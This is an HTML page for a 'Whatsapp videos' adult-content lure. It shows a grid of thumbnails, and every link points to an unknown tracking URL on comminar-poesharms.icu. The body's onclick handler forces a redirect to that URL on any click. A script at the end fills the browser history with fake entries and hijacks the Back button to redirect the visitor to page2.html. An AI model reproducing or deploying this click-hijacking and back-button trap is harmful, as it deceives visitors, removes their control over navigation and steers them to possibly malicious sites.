<html>
	<meta name="viewport" content="width=device-width,user-scalable=no">
	<style>
		body{
			background-image:url("a5.jpg");
			background-repeat:round;
         -webkit-background-attachment:fixed;     
         -o-background-attachment:fixed;     
         -ms-background-attachment:fixed;  
            background-attachment:fixed;     
			width:100%;
			margin:0px;
			padding:0px;
			}
		h1{
			background:#267651;
			color:white;
			text-align:center;
			width:100%;
			margin:0px;
			padding:0px;
			font-family:sans-serif;
			text-shadow:0 0 5px #6e6d6d,0 0 15px #fff;
			}
			table{
				width:95%;
				}
				img{
					width:100%;
					height:auto;
					-moz-border-radius:5px;
					-ms-border-radius:5px;
					-o2-border-radius:5px;
					border-radius:5px;
					}
					div{
						color:black;
						text-align:justify;
						width:95%;
						font-weight:bold;
						}
						a{
							text-decoration:none;
							font-weight:bold;
							}
							span{
								color:skyblue;
								font-weight:bold;
								}
		</style>
		<script>
								function goto(){
									location.href="https://comminar-poesharms.icu/click"
									}
									</script>
	<body onclick="goto()" onload="loadpage()">
		<h1>Whatsapp videos</h1>
		<center>
		<table>
			<tr>
			<td>
			<a href="https://comminar-poesharms.icu/click" target="_blank"><img src="22.png"></a>
				</td> 
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="08.png"></a>
				</td>
				</tr>
				<tr>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="13.png"></a>
				</td>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="03.png"></a>
				</td>
				</tr>
				<tr>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="19.png"></a>
				</td>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="20.png"></a>
				</td>
				<tr>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="01.png"></a>
				</td>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="02.png"></a>
				</td>
				</tr>
				<tr>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="09.png"></a>
				</td>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="10.png"></a>
				</td>
				</tr>
				<tr>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="11.png"></a>
				</td>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="12.png"></a>
				</td>
				</tr>
				<tr>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="07.png"></a>
				</td>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="21.png"></a>
				</td>
				</tr>
				<tr>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="23.png"></a>
				</td>
			<td>
			<a href="https://comminar-poesharms.icu/click"><img src="20.png"></a>
				</td>
				</tr>
				</table>
				</center><center><a href="https://comminar-poesharms.icu/click"><span>NEXT>></span></a>
					<div>We hope you enjoyed best videos of whatsapp! Best videos from whatsapp are updated between every one hour
If you are not a mature adult or are offended by pornography please don't come back!
						</div>
						</center>
							<center>
						<footer>
							&copy;afrowhatsappvideos.com
					</footer>
					</center>
					<script type="text/javascript">
 ! function () {
 var t;
 try {
 for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
 onpopstate = function (t) {
 t.state && location.replace("page2.html")
 } 
} catch (o) {}
 }();
 </script>
		</body>
	</html>
